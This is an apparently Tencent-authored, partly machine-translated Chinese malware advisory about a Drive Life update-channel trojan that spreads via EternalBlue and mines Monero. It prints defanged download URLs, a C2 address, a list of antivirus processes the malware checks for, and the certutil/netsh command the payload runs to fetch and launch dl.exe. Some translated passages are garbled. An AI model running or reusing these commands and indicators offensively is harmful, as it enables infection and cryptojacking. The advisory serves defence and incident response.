据腾讯安全威胁情报中心监测,一款通过“驱动生命”升级频道,同时利用“永恒之蓝”高危漏洞的木马突然爆发,短短两小时内被攻击用户数高达10万。“驾命”木马会利用高危漏洞在企业内网像蠕虫一样传播,并进一步下载云控木马在中毒电脑中挖掘门罗币。
一、概述12月14日下午,腾讯安全威胁情报中心监测发现,一个以“驱动生命”升级频道,通过“永恒之蓝”高危漏洞传播的木马突然爆发,短短2小时内被攻击用户数高达10万。
“驾命”木马会利用高危漏洞在企业内网像蠕虫一样传播,并进一步下载云控木马在中毒电脑上挖掘门罗币。云控木马对企业信息安全威胁巨大,企业用户应予以重视。
病毒刚好在周末爆发,让企业网管措手不及。员工电脑周一开机后,建议立即杀毒,然后利用杀毒软件的漏洞修复功能安装系统补丁。个人电脑用户可以使用腾讯电脑管家进行防身。
这次病毒爆发有三个特点:
1.驱动生命升级通道的病毒会在中毒电脑上安装云控木马;
2.该病毒会利用永恒之蓝漏洞在局域网中主动传播;
3.通过云端控制收集中毒电脑的一些信息,接受云端的指令在中毒电脑中开采门罗币。
特洛伊木马攻击流程图
其次,详细分析dtlupg.exe访问了以下网址下载病毒。
hxxp://xxxx . update . ack ng . com/zip tool/pull execute/f 79 CB 9d 2893 b 254 cc 75 DFB 7 F3 e 454 a 69 . exe
hxxp://xxxx . update . ack ng . com/calendar/pull execute/f 79 CB 9d 2893 b 254 cc 75 DFB 7 F3 e 454 a 69 . exe
(注意,为了防止用户点击以上链接直接下载病毒程序,隐藏了部分字符。)
病毒文件发布于:
c:\\ program files(x86)\\ dtlsoft \\ Riley \\ updater \\ ctrlf \\ f79cb2893b254cc75dbf7f3e454a69.exe等位置。
F79cb9d2893b254cc75dfb7f3e454a69.exe终于在运行后发布了C:\\WINDOWS\\Temp\\svvhost.exe。
(MD5: 2e9710a,4b,9ba3,CD,11e977af87570e3b),svvhost.exe将“永恒之蓝”等漏洞攻击工具打包,进一步在内外网传播。
2.1病毒矩阵
F79CB9D2893B254CC75DFB7F3E454A69.exe
运行后,将其自身复制到C:\\windows\\system32\\svhost.exe,作为服务安装并启动。服务名为Dper,然后拉起云控模块svhhost.exe和攻击模块svvhost.exe。
运行时首先检测互斥体,以确定它是否已被感染。
通过检测后面的进程,会收集到查杀软件的信息,准备上传。
360 tray . exe | 360 SD . exe | AVP . exe | kvmonxp . exe | rav mond . exe | mcshield . exe | egui . exe | kxe tray . exe | knsdtray . exe | tmbmsrv . exe | av center . exe | ash disp . exe | rtvscan . exe | ksafe . exe | qpcrtp . exe
当任务管理器和游戏进程被检测到时,云控制模块svhhost.exe退出。
打开互斥体,对象名是‘我是xmr记者’,xmr的意思是xmrig.exe矿机。
收集系统敏感信息上传到hxp:/hxxp://I . hago . net/I . png,接受返回的云控制代码执行。
父设置进程共享内存HSKALWOEDJSLALQEOD
2.2采矿
云控木马svhhost.exe的主要功能是从父进程svhost.exe的共享内存中读取shellcode进行解密执行,每隔2000秒读取共享内存中的shellcode进行解密执行。共享内存被命名为HSKALWOEDJSLALQEOD。目前shellcode的主要功能是挖矿,不排除后期会拉其他更恶意的加密、勒索等木马病毒来执行。
云控制的特洛伊木马执行过程
云控木马运行后会创建一个线程。这个线程函数的主要作用是判断进程svhost.exe(父进程)是否存在,如果不存在,启动进程,然后从这个进程中读取要读取的共享内存数据。
创建线程判断父进程是否存在。
调用OpenFileMappingA打开共享内存,读取共享内存数据。
共享内存数据被加压后,就会被执行。目前shellcode的主要功能是挖矿,不排除后期会拉其他更恶意的加密、勒索等木马病毒来执行。
执行外壳代码
尝试挖矿时,通讯IP是172.105.204.237
2.3攻击模块
攻击模块从地址hxxp://dl.haqo.net/eb.exez下载,作为子进程Svvhost.Exe启动。分析发现,该文件是python实现的“永恒之蓝”漏洞模块压缩打包程序。
Svvhost。Exe,子进程,是压缩python实现的“永恒之蓝”漏洞模块的打包器。
Mysmb.pyo是攻击时的扫码。
在GitHub上也可以看到相关的开源代码。
扫描内网445端口进行攻击。
不仅攻击内网易受攻击的机器,还随机找几个外网IP尝试攻击,第一次攻击后静默20分钟。
攻击成功后,paylaod招募机器执行以下命令传播内网。
cmd.exe/c certutil-URL cache-split-f http://dl.haqo.net/dl.exe c:/install . exec:/install . exenetsh防火墙添加端口打开tcp 65531 DNSnetsh接口端口代理添加v4tov4 listenport=65531连接地址=1.1.1.1连接端口=53
安全建议1。服务器暂时关闭不必要的端口(如135、139、445)。详情请参考https://guanjia.qq.com/web_clinic/s8/585.html.
2.周一上班后,建议企业用户使用腾讯御点查杀病毒(个人用户可使用腾讯电脑管家),然后使用漏洞修复功能修复系统在全网终端的高危漏洞;
3.服务器使用高强度密码,不使用弱密码,防止黑客暴力破解;
4.使用杀毒软件拦截可能的病毒攻击;
5.建议企业用户部署腾讯御高级威胁检测系统,防御可能的黑客攻击。royal advanced threat detection system是基于腾讯反病毒实验室的安全能力,依托腾讯在云端和终端的海量数据,独创的威胁情报和恶意检测模型系统。
